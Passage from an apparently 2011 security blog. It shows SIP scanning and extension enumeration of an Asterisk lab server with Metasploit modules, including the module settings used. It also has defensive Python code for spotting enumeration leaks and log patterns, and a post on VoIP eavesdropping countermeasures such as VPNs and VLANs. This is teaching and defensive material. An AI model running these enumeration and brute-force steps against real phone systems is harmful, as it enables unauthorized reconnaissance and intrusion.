<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo9iugdNIPyz5ZP4GMD7JhI47xKulcTCn06JoL9sDaeCjmYMhfdDliIAHtJc_9lPL_cif1nUPyUng3XBSw2XqhyphenhyphenUPXuk2UGNmNiHlukmMgMMRNOLunJiHrC2oCO13KMZQ-OjC4CRcjYMM/s1600/sip_adobe.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo9iugdNIPyz5ZP4GMD7JhI47xKulcTCn06JoL9sDaeCjmYMhfdDliIAHtJc_9lPL_cif1nUPyUng3XBSw2XqhyphenhyphenUPXuk2UGNmNiHlukmMgMMRNOLunJiHrC2oCO13KMZQ-OjC4CRcjYMM/s320/sip_adobe.jpg" width="241" /></a></div>
<br />
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;">Figure: Adobe SRV records</span></div>
<div style="text-align: center;">
<br /></div>
<span class="Apple-style-span" style="font-size: x-small;">NOTE: FOCA is not GPL; it's only <a href="http://en.wikipedia.org/wiki/Gratis_versus_Libre">free as in free beer</a> but, in my opinion, there is no replacement for the moment.</span><br />
<br />
There are some <a href="http://www.voipsa.org/Resources/tools.php#VoIP Scanning and Enumeration Tools">other VoIP-specific tools</a> which complement the classic ones discussed above. I'm going to focus on <a href="http://www.metasploit.com/download/">Metasploit</a> modules because the <a href="http://code.google.com/p/sipvicious/">Sipvicious</a> set of tools, which is the most used for these tasks and works in a very similar way, is widely documented over the net. These VoIP-specific scans strongly reduce the time compared with nmap because they send specific SIP request UDP packets instead of ICMP ones. In <a href="http://blog.sipvicious.org/2007/11/introduction-to-svmap.html">this post</a> we can find a complete explanation of that, and <a href="http://www.networkuptime.com/nmap/page3-10.shtml">here</a> it is explained how the nmap UDP scan works. You can compare it (<i>nmap -sU -p 5060 -sV TARGET</i>) and check that the speed difference is really huge. One important advantage of Metasploit over Sipvicious is the support for threading, which could speed up the process even more.<br />
<br />
So, at this point, we are ready to start scanning a testing environment formed by an Ubuntu 11.04 laptop hosting two virtual machines, connected in NAT mode:<br />
<ul>
<li>Backtrack 5 R1 box simulating the bad guy.</li>
<li>Debian Squeeze box with a basic installation of Asterisk 1.6.2.9-2 and only the <i>101</i> and <i>102</i> extensions allowed.</li>
</ul>
<br />
There are not too many Metasploit modules involving VoIP, but we already have the <i>auxiliaries</i> needed for SIP scanning and extension enumeration, as shown in the picture:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgCRtlLpEGqAlcCoorIiIExQ6cQV9jdlTaroVASwxlcl1Eil3c3wHGIvKxsNb24B_DzfHFshr_HvPU6fpPzSvByjgBHYLfVDOYMBD3WcxEqCS2f7KIMtOCtqhlFICGKpnTn9KopprQ0q0/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgCRtlLpEGqAlcCoorIiIExQ6cQV9jdlTaroVASwxlcl1Eil3c3wHGIvKxsNb24B_DzfHFshr_HvPU6fpPzSvByjgBHYLfVDOYMBD3WcxEqCS2f7KIMtOCtqhlFICGKpnTn9KopprQ0q0/s320/1.png" width="320" /></a></div>
<br />
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;">Figure: Metasploit SIP related modules</span></div>
<div style="text-align: center;">
<br /></div>
Now, I'm going to use <a href="http://www.fastandeasyhacking.com/">Armitage</a> (sorry guys, I like GUIs :P) in order to scan my network using the "SIP scan (UDP)" module (<a href="http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/auxiliary/scanner/sip/options.rb">auxiliary/scanner/sip/options</a>). It supports only OPTIONS scanning, but that is enough, as it is the most reliable type. In fact, an INVITE scan could be noisy and produce a "ring" at the other end. If you are interested in all these subjects and how they work more in depth, I recommend (as always) the <a href="http://www.hackingvoip.com/">"VoIP Hacking Exposed"</a> book.<br />
<br />
You only have to specify the target to configure the module; the next images show the steps and the correct result.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0HJecE0AZQhQvAsW9PG2Nff4R4ikCTsPl6e2l83SHtcCFMWY4jKt93eQNjljzwpRU-lGVaLcjY71L8a3O9kTukvIXYRZceEXGM9ksNX4TuQ_p8yb7MMSHhj6EvyyLkIydiTavnq0bhnE/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0HJecE0AZQhQvAsW9PG2Nff4R4ikCTsPl6e2l83SHtcCFMWY4jKt93eQNjljzwpRU-lGVaLcjY71L8a3O9kTukvIXYRZceEXGM9ksNX4TuQ_p8yb7MMSHhj6EvyyLkIydiTavnq0bhnE/s320/2.png" width="320" /></a></div>
<br />
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;">Figure: Module configuration</span></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhJHPvQ5UR9lpRF6N0IXa-4HZGrQU5iWzemj77yEVDcrS_eOoOHhlbnVLpJ5ihSsiBKeR01gNSfe3Df_YxckqvPKojosPr7lyeVSM00AA1qRRAy6auujnKwloM7F_9cs0aszYv53zkB90/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhJHPvQ5UR9lpRF6N0IXa-4HZGrQU5iWzemj77yEVDcrS_eOoOHhlbnVLpJ5ihSsiBKeR01gNSfe3Df_YxckqvPKojosPr7lyeVSM00AA1qRRAy6auujnKwloM7F_9cs0aszYv53zkB90/s320/3.png" width="320" /></a></div>
<br />
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;">Figure: Scan result</span></div>
<div style="text-align: center;">
<br /></div>
<br />
<b>Extension enumeration</b><br />
<br />
Instead of explaining how this attack works in a theoretical way (diagrams and all that stuff), I'm going to refer you to the book and show a situation which helps to understand why user/extension enumeration is possible. First, I will try to connect my Ekiga softphone to the Asterisk server with a non-existent user:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGwlSnB2Olrv6OXy5P_KdiW7Azbo5GD6jwuWBToi4VnOilGxo2bCLQs2CMU96phQKU1EgA8VSbFrhuWtkNZnwdkp16JzeAYgfZxzxG9D0iDwCtl2LbZJw-9hWIE2LRPmoaaKzKgYKCjNA/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGwlSnB2Olrv6OXy5P_KdiW7Azbo5GD6jwuWBToi4VnOilGxo2bCLQs2CMU96phQKU1EgA8VSbFrhuWtkNZnwdkp16JzeAYgfZxzxG9D0iDwCtl2LbZJw-9hWIE2LRPmoaaKzKgYKCjNA/s320/4.png" width="320" /></a></div>
<br />
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;">Figure: Bad user account configuration</span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfNZcThgMzps-5nHLzqk8IHbZOa0mCvxODaXpr2dRxebeNYA_shQuP1WvIJRw_s5d0sNTzuhIp6NmB5E41fXACzN8EUI2w_jAhMawMhuSRbS_KjEx7lM3I6wG69juroErtuC4T-9s3cuI/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfNZcThgMzps-5nHLzqk8IHbZOa0mCvxODaXpr2dRxebeNYA_shQuP1WvIJRw_s5d0sNTzuhIp6NmB5E41fXACzN8EUI2w_jAhMawMhuSRbS_KjEx7lM3I6wG69juroErtuC4T-9s3cuI/s320/5.png" width="320" /></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;"><br /></span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;">Figure: Bad login result</span></div>
<br />
OK, Asterisk didn't allow the connection; now we are going to try with an existing user and a bad password:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggtzmxTxkqrjXvqoks5UUXlTuTHjpuAicuWu7XP3ZbI-1TCcp__Pd_KjHyfa0pAAQUuQMyGxRZbwwXZom1Vc16fjxUEc0DNSta2a1RelxmsuxAHP6Q9Nj_obx8_9VhvJrramVtsJScimA/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggtzmxTxkqrjXvqoks5UUXlTuTHjpuAicuWu7XP3ZbI-1TCcp__Pd_KjHyfa0pAAQUuQMyGxRZbwwXZom1Vc16fjxUEc0DNSta2a1RelxmsuxAHP6Q9Nj_obx8_9VhvJrramVtsJScimA/s320/6.png" width="320" /></a></div>
<br />
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;">Figure: Correct user and bad password configuration</span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAQ-Wo-lq_WbDkGrzzFxNu73EZ6zPk3J3GoggYI5rooN6SfroTki3Dt3oW2AvBcNTSr-B6sTmWu5y5nmXPfHCXRe2vnlcokq-ktitSmcq19HVLkzle3Dc_aOZO961fGnzuoZQ-9xAmJPk/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAQ-Wo-lq_WbDkGrzzFxNu73EZ6zPk3J3GoggYI5rooN6SfroTki3Dt3oW2AvBcNTSr-B6sTmWu5y5nmXPfHCXRe2vnlcokq-ktitSmcq19HVLkzle3Dc_aOZO961fGnzuoZQ-9xAmJPk/s320/7.png" width="320" /></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;"><br /></span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;">Figure: “Not bad” login result</span></div>
<br />
The response is different in both cases so, as you can imagine at this point, we could easily identify different extensions. In order to automate this attack we can use the “SIP Username Enumerator (UDP)” module (<a href="http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/auxiliary/scanner/sip/enumerator.rb">scanner/sip/enumerator</a>), which supports REGISTER and OPTIONS scans (<i>METHOD</i> module parameter). Really it is a <a href="http://en.wikipedia.org/wiki/Brute-force_attack">brute-force attack</a> trying the specified extensions, so it is very important to specify the <i><a href="http://www.metasploit.com/modules/auxiliary/scanner/sip/enumerator">PADLEN</a></i> argument; if not, you could obtain a very long list of non-existent extensions. In my case I chose <i>PADLEN</i> equal to 3 because the extensions are <i>101</i> and <i>102</i>; I also modified <i>MAXENT</i> to fit with it.<br />
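The "different response" the enumerator relies on is something you can check on your own PBX before anyone else does. The following is an added example, not code from the original post: it reduces two REGISTER responses (one for a non-existent user, one for an existing user with a bad password) to the features an outside observer can compare, after stripping per-transaction values such as Call-ID, tags and the Digest nonce, and reports whether they still differ. The responses, addresses and realm are constructed here, not captured from the post's lab.

```python
import re

# RFC 3261 compact header names, expanded so they compare like the long form
COMPACT = {"v": "via", "i": "call-id", "t": "to", "f": "from",
           "l": "content-length", "m": "contact", "c": "content-type"}
# Per-transaction headers: they differ between any two requests (and carry the
# username we are testing), so an observer learns nothing from them.
VOLATILE = {"via", "call-id", "cseq", "date", "to", "from", "content-length"}
NONCE_RE = re.compile(r'nonce="[^"]*"')


def parse_sip_response(raw):
    """Parse the status line and headers of a SIP response (body ignored).
    Returns (status_code, reason_phrase, {lowercase_name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    m = re.match(r"SIP/2\.0 (\d{3}) (.*)$", lines[0])
    if not m:
        raise ValueError("not a SIP response: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(":")
        name = name.strip().lower()
        headers[COMPACT.get(name, name)] = value.strip()
    return int(m.group(1)), m.group(2), headers


def fingerprint(raw):
    """Everything an observer can compare across two REGISTER attempts: status
    code, reason phrase and the stable headers, with the Digest nonce masked
    because it is fresh on every challenge anyway."""
    code, reason, headers = parse_sip_response(raw)
    stable = sorted((n, NONCE_RE.sub('nonce="*"', v))
                    for n, v in headers.items() if n not in VOLATILE)
    return code, reason, tuple(stable)


def leaks_extension(resp_unknown_user, resp_bad_password):
    """True when 'user does not exist' and 'user exists, wrong password' are
    distinguishable, which is exactly the difference the enumerator exploits."""
    return fingerprint(resp_unknown_user) != fingerprint(resp_bad_password)


def build_response(status, user, www_auth=None):
    """Constructed REGISTER response (illustrative values, not a lab capture)."""
    extra = f"WWW-Authenticate: {www_auth}\r\n" if www_auth else ""
    return (f"SIP/2.0 {status}\r\n"
            f"Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK-{user}\r\n"
            f"From: <sip:{user}@192.0.2.1>;tag=c{user}\r\n"
            f"To: <sip:{user}@192.0.2.1>;tag=s{user}\r\n"
            f"Call-ID: {user}@192.0.2.10\r\n"
            "CSeq: 1 REGISTER\r\n"
            "Server: Example PBX\r\n"
            f"{extra}Content-Length: 0\r\n\r\n")


DIGEST = 'Digest algorithm=MD5, realm="example", nonce="{}"'

# Leaky server: the unknown user gets a flat 404, the known user is challenged.
LEAKY_UNKNOWN = build_response("404 Not Found", "999")
LEAKY_BADPASS = build_response("401 Unauthorized", "101", DIGEST.format("1a2b"))
# Hardened server (Asterisk behaves like this with alwaysauthreject=yes): both
# attempts are challenged identically; only the nonce differs, and it is masked.
HARD_UNKNOWN = build_response("401 Unauthorized", "999", DIGEST.format("3c4d"))
HARD_BADPASS = build_response("401 Unauthorized", "101", DIGEST.format("5e6f"))

if __name__ == "__main__":
    print("leaky server leaks extensions:", leaks_extension(LEAKY_UNKNOWN, LEAKY_BADPASS))
    print("hardened server leaks extensions:", leaks_extension(HARD_UNKNOWN, HARD_BADPASS))
```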
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi67xJqQqbNvlaxdKfsOuQcM6h1CL_8a4Z_wUybA5HCHxwzSbWDSr4nVo1WZyHrWFdQ3HPRB-YmPB8yp2Ia3r9H2MoAKRmMvG9IgFfXTafChskjNfL2ES8o0uyaAx8a9n4xL_3f4ETpaw4/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi67xJqQqbNvlaxdKfsOuQcM6h1CL_8a4Z_wUybA5HCHxwzSbWDSr4nVo1WZyHrWFdQ3HPRB-YmPB8yp2Ia3r9H2MoAKRmMvG9IgFfXTafChskjNfL2ES8o0uyaAx8a9n4xL_3f4ETpaw4/s320/8.png" width="320" /></a></div>
<br />
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;">Figure: Enumerator module configuration</span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl1wcZQncigWcBJAixT2IFyayRooyAHL7HunAK35KmOd_uRSiIw6HxQmK5-E70-VIzYCzwhsANF2teztwk8O2RcOtFrs5AJOfX4FTvQefvd8AUhkTh-y2WbcqyPfiz5YCMna0XPEBRKAM/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl1wcZQncigWcBJAixT2IFyayRooyAHL7HunAK35KmOd_uRSiIw6HxQmK5-E70-VIzYCzwhsANF2teztwk8O2RcOtFrs5AJOfX4FTvQefvd8AUhkTh-y2WbcqyPfiz5YCMna0XPEBRKAM/s320/9.png" width="320" /></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;"><br /></span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;">Figure: REGISTER extension enumeration result</span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDXUzApWkEQc3QWABekES3y8Q2TyIWL-kUC1Di02mMqm4GtHThqtV2_ozNjK7LYMEd8SpHX_iV1JmqLbOmvKS2le78WZp6uD5u2eMA-8SdyyCls1eoEE4_8LH7MyXtEyi9JrwDSvggy9A/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDXUzApWkEQc3QWABekES3y8Q2TyIWL-kUC1Di02mMqm4GtHThqtV2_ozNjK7LYMEd8SpHX_iV1JmqLbOmvKS2le78WZp6uD5u2eMA-8SdyyCls1eoEE4_8LH7MyXtEyi9JrwDSvggy9A/s320/10.png" width="320" /></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;"><br /></span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;">Figure: OPTIONS extension enumeration result</span></div>
<br />
As you can see, I got different results: the OPTIONS scan identified extensions <i>500</i> (Asterisk demo) and <i>600</i> (echo demo), while the REGISTER scan found the real extensions. So it is necessary to use both methods during a pentest.<br />
<br />
At this moment Metasploit does not support scanning the IAX (Inter-Asterisk eXchange) protocol, which, like SIP, is another VoIP protocol. There are the classic tools <a href="http://sourceforge.net/projects/enumiax/">enumIAX</a> and <a href="http://code.google.com/p/iaxscan/">iaxscan</a>, but we are only focusing on SIP at this time.<br />
<br />
Countermeasures against information gathering are a very interesting subject, but I think that is enough for today; typical solutions are <a href="http://ofps.oreilly.com/titles/9780596517342/asterisk-Security.html">Fail2ban combined with iptables</a> and <a href="http://www.opensips.org/html/docs/modules/1.6.x/pike.html">other tools</a> specific to each type of VoIP system.<br />
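The response oracle used by the enumerator above leaves a matching trace on the server side, which is what a Fail2ban-style countermeasure keys on. As an added example (not code from the post, Metasploit or Asterisk), the detector below parses constructed chan_sip-style registration failures and tells an extension sweep apart from a password-guessing run on one extension; the log format, addresses and thresholds are assumptions.

```python
"""Detect SIP extension enumeration in Asterisk-style registration logs.

Added example, not code from the post, Metasploit or Asterisk. The
enumeration the post describes works because the server answers a known
and an unknown extension differently; on the server side that difference
is also what the log records ("Wrong password" versus "No matching peer
found"), the same text a Fail2ban filter keys on. A source failing for
many distinct extensions in a short window, mostly unknown ones, is
enumerating; a source hammering one extension is guessing its password.
Log lines are constructed in the style of chan_sip NOTICE messages, with
RFC 5737 documentation addresses.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

UNKNOWN = "No matching peer found"  # extension does not exist
WRONG_PW = "Wrong password"         # extension exists, secret is wrong

# One registration-failure NOTICE; the quoted display name is optional.
LINE_RE = re.compile(
    r"^\[(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2})\].*?Registration from "
    r"'(?:\"[^\"]*\" )?<sip:(?P<ext>[^@>]+)@[^>]*>' failed for "
    r"'(?P<src>[0-9.]+):\d+' - (?P<reason>.+)$"
)

# Constructed sample log (not a real capture).
TEMPLATE = ("[{ts}] NOTICE[2210] chan_sip.c: Registration from "
            "'\"{ext}\" <sip:{ext}@pbx.example>' failed for '{src}:5060' - {reason}")
SAMPLE_EVENTS = (
    # 203.0.113.9 walks extensions 100-105 in a few seconds; only 101 and 102 exist
    [("Sep 15 10:01:0%d" % i, str(100 + i), "203.0.113.9",
      WRONG_PW if 100 + i in (101, 102) else UNKNOWN) for i in range(6)]
    # 198.51.100.7 keeps guessing the secret of one known extension
    + [("Sep 15 10:05:%02d" % (10 + 3 * i), "101", "198.51.100.7", WRONG_PW)
       for i in range(6)]
    # 192.0.2.5 is a user who mistyped a password once
    + [("Sep 15 11:30:00", "102", "192.0.2.5", WRONG_PW)]
)
SAMPLE_LOG = "\n".join(TEMPLATE.format(ts=t, ext=e, src=s, reason=r)
                       for t, e, s, r in SAMPLE_EVENTS)


def parse_log(text):
    """Return (timestamp, source, extension, reason) for each failure line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:  # other NOTICE/WARNING lines are ignored
            events.append((datetime.strptime(m["ts"], "%b %d %H:%M:%S"),
                           m["src"], m["ext"], m["reason"]))
    return events


def classify_sources(events, window=timedelta(seconds=60), threshold=5):
    """Per source, inspect its busiest window and name what it looks like.

    `threshold` failures inside `window` is the kind of rule a Fail2ban jail
    bans on; the extension/reason mix tells which attack it was.
    """
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev[1]].append(ev)
    verdicts = {}
    for src, evs in by_src.items():
        evs.sort()
        busiest, lo = [], 0
        for hi in range(len(evs)):  # sliding window over time-sorted events
            while evs[hi][0] - evs[lo][0] > window:
                lo += 1
            if hi - lo + 1 > len(busiest):
                busiest = evs[lo:hi + 1]
        exts = {e[2] for e in busiest}
        unknown = sum(1 for e in busiest if e[3] == UNKNOWN)
        if len(busiest) < threshold:
            verdict = "normal"
        elif len(exts) > 1 and unknown * 2 >= len(busiest):
            verdict = "extension enumeration"
        elif len(exts) == 1:
            verdict = "password brute-force"
        else:
            verdict = "mixed brute-force"
        verdicts[src] = {"verdict": verdict, "attempts": len(busiest),
                         "extensions": sorted(exts), "unknown": unknown}
    return verdicts


if __name__ == "__main__":
    for src, info in classify_sources(parse_log(SAMPLE_LOG)).items():
        print(src, info)
```

Setting <i>alwaysauthreject=yes</i> in <i>sip.conf</i> removes the client-visible difference between the two failures, but the server log keeps recording the reason, so the classification above still works.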
<br />
<div style="text-align: right;">
Jesús Pérez</div>Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-87830676656738701972011-08-26T12:17:00.002+02:002012-02-15T10:36:46.466+01:00VoIP Eavesdropping: Counter MeasurementsAs we saw in the <a href="http://nicerosniunos.blogspot.com/2011/08/voip-eavesdropping-ucsniff-ii.html">last two posts</a>, <a href="http://en.wikipedia.org/wiki/Session_Initiation_Protocol">SIP</a> (Session Initiation Protocol) is easy to sniff because it is transmitted unencrypted over the network. There are some solutions that address this, but none of them is definitive. The next picture shows a very basic diagram of a VoIP infrastructure that I will use throughout this post. At this point we should understand that SIP is used for creating, modifying and terminating sessions, and that these sessions consist of one or several <a href="http://en.wikipedia.org/wiki/Streaming_media">media streams</a> that flow directly between the clients, leaving the <a href="http://www.webopedia.com/TERM/S/SIP_proxy.html">SIP proxy</a> aside.<br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTijo_gRnJ7k7Ccg66-HL1cJHQ29NCw7fqHHrSN-UOu8jPIxqEyZwLl2F_eExUjUhManDTz0csaYFtfRdPXTMDKcUtJzOgPz8glhowGjiwFfbClNSGctQDe2DhdL9GPY21YiBP2zz_o3o/s1600/0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTijo_gRnJ7k7Ccg66-HL1cJHQ29NCw7fqHHrSN-UOu8jPIxqEyZwLl2F_eExUjUhManDTz0csaYFtfRdPXTMDKcUtJzOgPz8glhowGjiwFfbClNSGctQDe2DhdL9GPY21YiBP2zz_o3o/s320/0.png" width="320" /></a></div>
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: Basic VoIP network infrastructure</span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div>
<span class="Apple-style-span" style="font-family: inherit;">Mainly, we have two options to prevent eavesdropping attacks: <b>encryption</b> or <b>network separation</b>.</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><b>Network separation</b></span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">It is usually too difficult to obtain the resources needed to physically separate the VoIP network from the organization's data network. The common solution is to use managed switches and set up different <a href="http://en.wikipedia.org/wiki/Virtual_LAN">VLANs</a></span> (Virtual LANs).<br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">But this only applies inside your LAN, and there are many techniques for evading this kind of switch control that allow an attacker to hop between VLANs; a simple Google search turns them up:</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><a href="http://www.google.es/search?sourceid=chrome&ie=UTF-8&q=vlan+hop">http://www.google.es/search?sourceid=chrome&ie=UTF-8&q=vlan+hop</a></span><br />
<span class="Apple-style-span" style="font-family: inherit;">In fact, the software used in the previous posts supports it for some Cisco routers, as shown in the picture:</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZrBJyKdyY-Jow_pgLvwLx8Ga5KeyaWI_t1DHaHhfNH_i6Oas_xuC_UsNQw2lp_Cd_SyflhdVr4tIQl_ovJS-LS-THRYYkOssPuuhO53adInNDC75vBJaGKgSkCDkUUFi1xA9aEiQy0HI/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="265" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZrBJyKdyY-Jow_pgLvwLx8Ga5KeyaWI_t1DHaHhfNH_i6Oas_xuC_UsNQw2lp_Cd_SyflhdVr4tIQl_ovJS-LS-THRYYkOssPuuhO53adInNDC75vBJaGKgSkCDkUUFi1xA9aEiQy0HI/s320/1.png" width="320" /></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit; font-size: x-small;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: UCSniff VLAN hop</span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div>
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><b>Encryption</b></span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">In this case we also have several options:</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">- <b>VPN</b> (<a href="http://en.wikipedia.org/wiki/Virtual_private_network">Virtual Private Network</a>): As you can see in the figure, it is possible to encrypt communications between the VoIP terminals of your system using a VPN; if all traffic is encrypted, both SIP and RTP are protected. This solution defends us from sniffers on the Internet but not inside the organization, which is why a dedicated VLAN is also recommended in order to minimize data exposure. </span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0x-rKE4GqMJuU4K_zOvheYln8kQUzEPrQhm3jjRsyWPvKRqzNGzKAlfytQ0i4vxE4EzYP1SlTxo1HqLl5vP4GO0LcUkyK7J3E0xgzoNehaXBLoh53SIh8wtrmjSgvhnklSpBqKYmCGvU/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="139" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0x-rKE4GqMJuU4K_zOvheYln8kQUzEPrQhm3jjRsyWPvKRqzNGzKAlfytQ0i4vxE4EzYP1SlTxo1HqLl5vP4GO0LcUkyK7J3E0xgzoNehaXBLoh53SIh8wtrmjSgvhnklSpBqKYmCGvU/s320/2.png" width="320" /></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit; font-size: x-small;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: VPN example</span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div>
<span class="Apple-style-span" style="font-family: inherit;">- <b>Built-in encryption</b>: Some proprietary software, such as <a href="http://www.skype.com/">Skype</a>, uses its own cipher protocol, understandable only by Skype clients. Traffic is encrypted and the <a href="http://en.wikipedia.org/wiki/Skype_protocol">protocol</a> relies on a P2P network formed by clients and nodes, but this architecture is too complex to summarize in a few words, so I recommend reading these papers:</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><a href="http://www.linecity.de/INFOTECH_ACS_SS05/acs5_top1_paper.pdf">http://www.linecity.de/INFOTECH_ACS_SS05/acs5_top1_paper.pdf</a></span><br />
<span class="Apple-style-span" style="font-family: inherit;"><a href="http://www.mjalali.com/blog/?p=10">http://www.mjalali.com/blog/?p=10</a></span><br />
